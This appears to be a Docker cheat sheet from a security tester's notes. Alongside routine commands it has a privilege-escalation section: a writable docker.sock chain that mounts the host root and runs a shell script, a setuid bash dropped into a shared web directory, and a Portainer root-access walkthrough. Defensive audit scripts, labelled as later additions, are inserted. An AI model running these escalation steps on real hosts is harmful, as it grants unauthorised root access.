# Docker

## 00. Basic

```bash
## ------------------| Container Lifecycle
docker run -it ubuntu bash  
docker run -d nginx  
docker start <container_id>  
docker stop <container_id>  
docker restart <container_id>  
docker kill <container_id>  
docker pause <container_id>  
docker unpause <container_id>  

## ------------------| Container Listing / Info
docker ps  
docker ps -a  
docker ps -q  
docker inspect <container_id>  
docker stats  
docker top <container_id>  

## ------------------| Container Exec / Access
docker exec -it <container_id> bash  
docker attach <container_id>  

## ------------------| Logs & Debugging
docker logs <container_id>  
docker logs -f <container_id>  
docker events  

## ------------------| Container Cleanup
docker stop $(docker ps -aq)  
docker rm $(docker ps -aq)  
docker rm -f $(docker ps -aq)  

## ------------------| Images
docker pull <image>  
docker push <image>  
docker images  
docker rmi <image_id>  
docker rmi $(docker images -q)  

## ------------------| Build / Tag
docker build -t myimage .  
docker tag <image_id> myrepo/myimage:tag  

## ------------------| Volumes
docker volume create myvolume  
docker volume ls  
docker volume inspect myvolume  
docker volume rm myvolume  
docker volume rm $(docker volume ls -q)  

## ------------------| Networks
docker network ls  
docker network create mynetwork  
docker network inspect mynetwork  
docker network connect mynetwork <container_id>  
docker network disconnect mynetwork <container_id>  
docker network rm mynetwork  

## ------------------| System Cleanup
docker system prune  
docker system prune -a  
docker system prune -a --volumes  

## ------------------| Docker Compose
docker compose up  
docker compose up -d  
docker compose down  
docker compose build  
docker compose logs  
docker compose ps  

## ------------------| Misc Useful
docker version  
docker info  
docker system df  
docker cp <container_id>:/path /host/path  
docker cp /host/path <container_id>:/path  
```

* Configurations.

```yaml
## ------------------| docker-compose.yaml
version: "3"                    ## optional since v1.27.0
services:
    website:                    ## Service name
        image: nginx
        ports:
            - "8080:80"
        restart: always         ## Always start when the machine reboots
```

```bash
## ------------------| Start/Stop
### Start/Run
sudo docker-compose up -d
### Stop/Down
sudo docker-compose stop
sudo docker-compose down
```

* Login

```bash
## ------------------| Normal login
docker login <URL>

## ------------------| If the registry has a certificate file
mkdir -p /etc/docker/certs.d/<url_name>
cp ca.crt /etc/docker/certs.d/<url_name>/ca.crt
docker login <URL>

cat /etc/docker/daemon.json
{
   "insecure-registries":["docker.registry.htb:443"]
}
```

## 02. Exploitation

* Is `Docker Sock` writable?

```bash
## ------------------| How to check
ls -al /var/run/docker.sock

## ------------------| Web APIs (https://docs.docker.com/engine/api/v1.41/)
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json

## ------------------| Exploit chain
### Create new container --> map root drive
### We need to know which image we can use; run the following command and take the RepoTags value.
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[] | .RepoTags[0]'

### Create the JSON object in a file (shell.json). Remove the comments before saving!
{
    "Image" : "sandbox", ## <---- RepoTags value
    "Cmd" : ["/bin/sh","-c","chroot /mnt sh -c \"bash /tmp/shell.sh\""], ## <---- shell
    "Binds" : [
        "/:/mnt:rw"
    ]
}

### Use curl to create the new container
curl -X POST -H "Content-Type: application/json" -d @shell.json --unix-socket /var/run/docker.sock http://localhost/containers/create

### Get the Id value from the response; replace <ID> with it; start the container
curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
```
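To audit for the configuration this chain relies on, the following added example (not part of the original page) scans `docker inspect` output for containers that bind-mount the host root or the Docker socket. The sample JSON, container names and function names are constructed for illustration.

```python
import json

# Constructed sample: trimmed `docker inspect` output for two containers.
SAMPLE_INSPECT = json.loads("""
[
  {"Name": "/web", "Mounts": [
    {"Type": "bind", "Source": "/srv/site",
     "Destination": "/usr/share/nginx/html", "RW": false}]},
  {"Name": "/helper", "Mounts": [
    {"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": true},
    {"Type": "bind", "Source": "/var/run/docker.sock",
     "Destination": "/var/run/docker.sock", "RW": true}]}
]
""")

SOCKET_PATHS = {"/var/run/docker.sock", "/run/docker.sock"}


def audit_container(info):
    """Return findings for one `docker inspect` object."""
    findings = []
    for mount in info.get("Mounts") or []:
        if mount.get("Type") != "bind":
            continue  # this check covers bind mounts only
        src = mount.get("Source", "")
        dst = mount.get("Destination", "")
        mode = "rw" if mount.get("RW") else "ro"
        if src == "/":
            findings.append(f"host root mounted at {dst} ({mode})")
        elif src in SOCKET_PATHS:
            findings.append(f"Docker socket mounted at {dst} ({mode})")
    return findings


def audit(inspect_output):
    """Map container name -> findings, skipping containers with none."""
    report = {}
    for info in inspect_output:
        findings = audit_container(info)
        if findings:
            report[info.get("Name", "?").lstrip("/")] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_INSPECT).items():
        for finding in findings:
            print(f"{name}: {finding}")
```

On a live host, feed it the parsed output of `docker inspect $(docker ps -aq)` instead of the sample.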

* Host Share Abuse

```bash
root@efaa6f5097ed:~# cp /bin/bash /var/www/html/survey/h4rithd
root@efaa6f5097ed:~# chmod 6777 /var/www/html/survey/h4rithd
root@efaa6f5097ed:~# ls -l /var/www/html/survey/h4rithd
```
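To detect what this leaves behind on the host side, the following added example (not part of the original page) walks a directory shared with containers and reports regular files carrying the setuid or setgid bit. The directory layout and file names in `demo()` are constructed; on a real host, point `find_setid_files` at the shared path.

```python
import os
import stat
import tempfile


def find_setid_files(root):
    """Return regular files under root that carry the setuid or setgid bit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: do not follow symlinks out of the share
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append({
                    "path": os.path.relpath(path, root),
                    "mode": format(stat.S_IMODE(st.st_mode), "04o"),
                    "owner_uid": st.st_uid,
                    "world_writable": bool(st.st_mode & stat.S_IWOTH),
                })
    return sorted(hits, key=lambda h: h["path"])


def demo():
    """Build a constructed share in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as share:
        os.makedirs(os.path.join(share, "survey"))
        normal = os.path.join(share, "survey", "index.php")
        flagged = os.path.join(share, "survey", "helper-bin")
        for path in (normal, flagged):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        os.chmod(normal, 0o644)
        os.chmod(flagged, 0o4755)  # constructed setuid file; the page's example uses 6777
        return find_setid_files(share)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

A setuid file owned by root inside a web root or other container-shared path has no legitimate reason to exist and should be treated as an incident indicator.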

* Privilege Escalation via [Portainer](https://www.portainer.io)

<figure><img src="/files/HkjH5FJ06XtL67U6GVjR" alt=""><figcaption><p>Create new volume with these settings</p></figcaption></figure>

<figure><img src="/files/RuJVNFB8uNDApSqLRPVj" alt=""><figcaption><p>Select any ID </p></figcaption></figure>

<figure><img src="/files/UIyHm82uMj8ybqgSmX6x" alt=""><figcaption><p>Copy the sha256 ID value</p></figcaption></figure>

<figure><img src="/files/4LI12yWBG6nQnkAJheSA" alt=""><figcaption><p>Paste the value in the image section</p></figcaption></figure>

<figure><img src="/files/J8H8GSuwEbc8X8TO8fRw" alt=""><figcaption><p>Set the console</p></figcaption></figure>

<figure><img src="/files/9rS1IAZwqe5cp8EpXMg1" alt=""><figcaption><p>Set the volume to newly created one</p></figcaption></figure>

<figure><img src="/files/dqdkGavzpPZbkRkHQ1W2" alt=""><figcaption><p>Go inside to the container and click the console button</p></figcaption></figure>

<figure><img src="/files/sHvlrzxMKHTzdMORGHB6" alt=""><figcaption><p>Here you have root directory</p></figcaption></figure>


